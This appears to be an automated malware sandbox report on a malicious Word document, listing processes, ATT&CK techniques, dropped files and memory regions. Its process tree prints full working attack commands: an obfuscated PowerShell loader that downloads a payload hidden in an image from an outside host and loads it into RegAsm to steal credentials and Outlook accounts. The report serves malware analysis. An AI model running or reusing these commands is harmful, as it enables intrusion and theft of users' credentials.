"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\InternetMonkeyloverkissoff.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreSwBTDgTreEsDgTreSwDgTrevDgTreGsDgTreYgBrDgTreC8DgTreUDgTreBQDgTreE0DgTreQQBYDgTreC8DgTreODgTreDgTre3DgTreC4DgTreNQDgTre1DgTreDIDgTreLgDgTreyDgTreDYDgTreMQDgTreuDgTreDkDgTreMwDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBLDgTreEIDgTreSwBLDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.KSKK/kbk/PPMAX/87.552.261.931//:ptth' , '1' , 'C:\ProgramData\' , 'KBKK','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\KBKK.vbs"
5⤵
PID:2888

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfjeyirokaqlrssnutvmiqtsjj"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2356

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ehowybcqyiipbygzlepftdobkyofc"
6⤵
- Accesses Microsoft Outlook accounts
PID:2440

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\pcchztnjuqaceecdvpchwiisseyovsun"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1fb1503ead400f7e689a6e3515ca51c5

SHA1
6725e48da4bf8704ce4ec5d571d80f0ddfef3b79

SHA256
dcfa0ffd50618c8edec98063adc631f08e75d119f8a7e6556582b2af2acdf9ee

SHA512
9baec11816de1496828605b23c6c6b13df7b8776ddd265c3be7a1122a28f232558ef1930c8eb3c3258dd1d987442510468128cea78239454a87d36d34c8f45e2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
304B

MD5
3a28a679dc4d553d3c42e0c08fc16f81

SHA1
3262df378bc49ff91f8de2d25541b1aa703b39b4

SHA256
362ea40e5d01c70b4d52431a1f743d3bf305795d6d8aaa2fdd3260b2c09ff1f0

SHA512
1512f95530d2cd605e98b6f5abc5399f26229acf5f40184ac79fcad1fbf6261c96f012843ef750f66ec35eb91eaeb08ab894571ddb67b6c5e601b656e752c539

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
343deb15ba6e21b2cc80121b955a71b2

SHA1
888c67cd8938c81236d6ebbfda3cb2ffd4d3ddd6

SHA256
db63af4f3b6147dd1c96ddc51b1f02c232d211a00481f68ee9f77df918166ab1

SHA512
2d3e619374f3ff8563e5189867d29c40205ec4c0e10ce550d04f6943af1cecb7a4c173c54b7f995006c631e056f46951509f3909cdcedc41f68603718cc181a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\moneyjumpinginthetreewithmonkeycallkissherloverwithouthavingkissingbetterthananotherlovreshe___isverybeautifulgirlmonkeykisser[1].doc
Filesize
79KB

MD5
390887d6627a4de66aac8349c57a495a

SHA1
aec3c18736f1ab675276c7b21076b0b48c3251a7

SHA256
4aefad6748025172503bac223b804d8de0dc741483409c7f19bc29b1859ba0bb

SHA512
b0a8fc3d7d833d972c9b63d79725ec72cbce81ddcbd2d0f4106ca7c626ae6749b989128533f022638e2b7cb71719e5d9ad0038fc93f63e9fb2bab584df903c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC9A5.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC9C8.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCAF6.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cfjeyirokaqlrssnutvmiqtsjj
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{3C8FBAE2-DCF8-4919-8917-37FC12110873}
Filesize
128KB

MD5
ccf3d1725337c7dd5b04a5806cde29f5

SHA1
523693af586adadbb8d9d56c58999de6f258cef7

SHA256
6a729e07c2d03866ad5fc79e741ebf0272332e6497e7081389877581a8ea7bbc

SHA512
6ee03763f7de52f6519d3e8ee9da773169c7b5a1f5756ccea2e3b7d39dede19b07c2ede00c143506ca80f82e66f19981a07ac14f1f85543785d76c224211002d

Download Submit
C:\Users\Admin\AppData\Roaming\InternetMonkeyloverkissoff.vbs
Filesize
86KB

MD5
f298cc29054bc56d193e76414d436b2c

SHA1
f521a11c9e63022ae0a7228117ca6aea51a23f82

SHA256
b0e22909bea588ce8ab5dfb7d8a624b2e262dab70d4eaced092060872aa44a6e

SHA512
882aa14f083185e624198b4ade4c2a972305e2062928c2363ec14c3aacc6aa0902e98adaf63d8c641d3a015629601a9940b230826328d250ed788d2a744f536c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize
20KB

MD5
0e05fb5f4ad0247aa294ca08c3d2ed28

SHA1
b3ba4f16171d0365308fc601694fe9ece74be72e

SHA256
f3534deb0d8e820c6bfb9746502863cd437cfc27bb251a033743b642dfffb8bc

SHA512
128e1b27360cc5eb78bd4f38cb842350a674c733b68c6e780533267f9f4084b5aaa4a1b789ad6e8f0cc32117c605a9886ee60e590c4661bc3562d66edc0c796d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
be8c19159a92bdaff60eb322b76e55b1

SHA1
bcaf1af2767da183e736fe7b4c571630eae1bbf5

SHA256
05ee9728ed2a70f09551df65a3f508c3fe513a6897ddf1861d97a8efc91c26e2

SHA512
e35db3ff553046ea530338f05fe955cdfbec99e3c1ef25c80c1fe36c719f1cf59cd99ab1e1ecc12a3d3384d7a7f4f7fcf1e2458b9d960d353781227190a4cbf1

Download Submit
memory/524-125-0x0000000002790000-0x00000000027D0000-memory.dmp

Filesize
256KB

Download
memory/524-217-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/524-200-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/524-122-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/524-123-0x0000000002790000-0x00000000027D0000-memory.dmp

Filesize
256KB

Download
memory/524-124-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/2260-114-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-223-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/2260-196-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-115-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-116-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-113-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/2260-112-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/2260-199-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-198-0x0000000002430000-0x0000000002470000-memory.dmp

Filesize
256KB

Download
memory/2260-195-0x0000000069DB0000-0x000000006A35B000-memory.dmp

Filesize
5.7MB

Download
memory/2284-249-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-254-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-260-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-259-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-257-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-258-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2284-256-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2356-239-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-230-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2356-247-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-244-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-265-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-232-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-236-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2440-242-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2440-274-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2440-253-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2440-252-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2440-248-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2440-237-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2592-209-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-271-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2592-225-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-227-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-226-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-229-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-222-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-210-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-220-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-221-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2592-278-0x0000000010000000-0x0000000010019000-memory.dmp

